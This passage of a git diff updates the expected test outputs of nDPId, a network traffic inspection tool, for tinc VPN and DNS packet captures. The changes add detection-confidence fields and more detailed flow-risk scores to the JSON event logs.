ucaaCwVm1u\/1te\/n+aOftes5xygxK+OaKehbJ47nnj4GJRcueg7KFHNq2ES0Uj1Rh2+lhguZLWYwLh4\/FPK0vdBcca9l29F4kxSaDHn6BeoZpX+wivGn5jMTbID2EPugYpELm+yXQDHU1W7JBJkdRRhJfBWIKo8UZofXK4qgL2\/MqCqF2T2\/hEjt9sAO7DVGx2T23++65+kzCDH2qiAfrQdQFlN08V17FGkydmcJibPSSbSe7aLjPjiXuGdc7ip\/LMmiTS0sCJq6zHCBk5aHilHCEqmTl+eL9Q9vwrMeAdX+cTIhD7xTxK6aeGzriTEJFQi6+ZDkO2+SfJZlZhRSLhc55JEaOH4LdN2VABhAfw=="}
 01668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1495983428043,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":958,"pkt_l4_len":924,"ts_msec":1495983428043,"pkt":"ACbGCvpSABcILL3nCABFCAOwAABAADERhuO5U9pwg3KoG9lo2WgDnO+CxkvMU5czu375VqRfqLEu7HGryDGh\/bfeaQJnEYyovrmntDxt74C8PKQJMHvY4MA1ZHuHhnLJLLc7h764zEbGLw\/vzqsaP4XOJmX3J5ZoXTmAMsXnjvJUPqVeWdg0PXJhqa6st9hNynxv5D0rpJqm0\/zV192qcE59jCUVvmB8PfyMGzNb8iu7j79YvIHCzFHzmycvx5sIdKuzv+9aaD2+9O1fWAuPwq8\/8DIg8DeQB7htbL3\/j6lwDGupSOVHCsI1+lYyNr8A5\/OFujJsJCBzKGXQVn+oJRoQMsFgr0giRTOfhVQb+GlZOLXTcVvxl6mNiWSoDQXoxAfPuixrlp8F\/MUrFtVqJYJIqlWUSZ0FHJzKiXJ5yQvwNmnsvYHqMQNW6ZCn++1tGEto8r5tq\/BDe0FvMAOQC\/Iq49d9xjtHRJaZkPSuUT0Ue8\/0Y0g7e7MLBCNRDp3pFvP\/SDROeSBv+1Hrsd3VgZ3eZsdET6SE7O+jiB1npy8XRuCERu\/h5FlX8FbvbKHJP4IXbapoGYosv9tEU2XONo65wz3MCF\/bVbrUPcOASb6j+c55C5rFZMKjA9llC2lki+5ox8NX3C0rsVb9ezbzAq4pvwBxx6yeMVlmBhRxjwXLWviN6bjb8+kKUMxdeqvtFZ90hWLG3av8x5N1D1shhjp\/Pkh3vfzESwJoedvps7xxuR16c9ku4Rlje1SzPbiXWLLd2ctB3NoWHVeTFrvLRU2yqM5LNXQpjLOWYVqndimokWzm3PvfsX2+ickLKvqhiNB8NMbCQKKllVtQtaf37M0W3hxij8fNqkfQ3Dwvv36xYQY6aA2cxZJ7cAJfgWt3+2IqzsbQ\/hOa1lDnl8uliASJ4hjXOWhi4prZ86H1uoSeDR53SAlBdMQQ3YoaLSv6kQQOXAUwHuZQi7+x\/RE5HfoAvVeNzG90OcOnL2uiCxjhyp3\/swc9NGfoqhpvTPlS\/HF6E4gzQu+uwm3Kmj7AsKixik3ciIBb6VqLoyiaQR35wKSQydm3qyc2A8RxVwJEHM9ChZNid+PGF9MC3cdjsTP6IG4AOw3VS8jLQznT38vyJvgWelWwQ+I9gJ2zh8MbfaLP+EWNQPI478wMYlCsuyg5uNNDg0lSF1epToqo6+lky+h2nAa21hKOviRtVRN8LV88QPWbYJx4n3gM4sg9yVPde6y+bdl\/hYGe1J5JIAW7OGyTqN+C43dvapKXMw=="}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1495983428000,"flow_last_seen":1495983470973,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164056,"flow_avg_l4_payload_len":1261,"midstream":0,"ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":134,"flow_first_seen":1495983428043,"flow_last_seen":1495983463866,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164136,"flow_avg_l4_payload_len":1224,"midstream":0,"ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
+00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1495983427744,"flow_last_seen":1495983475109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":5390,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":130,"flow_first_seen":1495983428000,"flow_last_seen":1495983470973,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164056,"flow_avg_l4_payload_len":1261,"midstream":0,"ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":134,"flow_first_seen":1495983428043,"flow_last_seen":1495983463866,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":1468,"flow_tot_l4_payload_len":164136,"flow_avg_l4_payload_len":1224,"midstream":0,"ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"185.83.218.112","dst_ip":"131.114.168.27","src_port":55656,"dst_port":55656,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
+00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1495983427717,"flow_last_seen":1495983475073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":4647,"flow_avg_l4_payload_len":178,"midstream":0,"ts_msec":1495983475109,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":317,"source":"tinc.pcap","alias":"nDPId-test","total-events-serialized":26}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 317/317
@@ -32,9 +32,9 @@
 ~~ total active/idle flows...: 4/4
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4616135 bytes
-~~ total memory freed........: 4616135 bytes
-~~ total allocations/frees...: 99891/99891
+~~ total memory allocated....: 4700104 bytes
+~~ total memory freed........: 4700104 bytes
+~~ total allocations/frees...: 101481/101481
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
 ~~ json string max len.......: 2390 chars
diff --git a/test/results/tk.pcap.out b/test/results/tk.pcap.out
index 13626f635..5b01b234c 100644
--- a/test/results/tk.pcap.out
+++ b/test/results/tk.pcap.out
@@ -1,22 +1,22 @@
 00434{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tk.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315029,"flow_last_seen":1613939315029,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1613939315029,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1613939315029,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1613939315029,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6W4cAAEARmyjAqAGywKgBAcryADUAJu9GCIYBAAABAAAAAAAABXdob2lzA2RvdAJ0awAAAQAB"}
-00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315029,"flow_last_seen":1613939315029,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1613939315029,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315029,"flow_last_seen":1613939315029,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1613939315029,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1613939315127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1613939315127,"pkt":"KDc3AG3IEBMx8Tl2CABFAABKKoNAADkRkxzAqAEBwKgBsgA1yvIANgAACIaBgAABAAEAAAAABXdob2lzA2RvdAJ0awAAAQABwAwAAQABAAABLAAEaJs3ng=="}
-00739{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.155.55.158"}}
+00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.155.55.158"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315127,"flow_last_seen":1613939315127,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1613939315127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1613939315127,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6pQMAAEARUazAqAGywKgBAdknADUAJrATOWkBAAABAAAAAAAABXdob2lzA2RvdAJ0awAAHAAB"}
-00725{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315127,"flow_last_seen":1613939315127,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315127,"flow_last_seen":1613939315127,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1613939315127,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1613939315183,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"ts_msec":1613939315183,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB1z01AADkR7ibAqAEBwKgBsgA12ScAYQAAOWmBgAABAAAAAQAABXdob2lzA2RvdAJ0awAAHAABwBIABgABAAAOEAAvA25zMQNkbnPAFgNzb2EHZnJlZW5vbQNjb20AYBhZHgAAA4QAABwgAAk6gAAAHCA="}
-00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1613939315183,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00760{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1613939315183,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315184,"flow_last_seen":1613939315184,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1613939315184,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613939315184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1613939315184,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6otUAAEARU9rAqAGywKgBAdI8ADUAJlfumIYBAAABAAAAAAAABXdob2lzA2RvdAJ0awAADwAB"}
-00725{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315184,"flow_last_seen":1613939315184,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1613939315184,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613939315184,"flow_last_seen":1613939315184,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1613939315184,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613939315239,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"ts_msec":1613939315239,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB1ZXdAADkRV\/3AqAEBwKgBsgA10jwAYQAAmIaBgAABAAAAAQAABXdob2lzA2RvdAJ0awAADwABwBIABgABAAAOEAAvA25zMQNkbnPAFgNzb2EHZnJlZW5vbQNjb20AYBhZHgAAA4QAABwgAAk6gAAAHCA="}
-00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315029,"flow_last_seen":1613939315127,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":51954,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00760{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613939315184,"flow_last_seen":1613939315239,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":53820,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"whois.dot.tk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"tk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1613939315127,"flow_last_seen":1613939315183,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1613939315239,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"192.168.1.1","src_port":55591,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
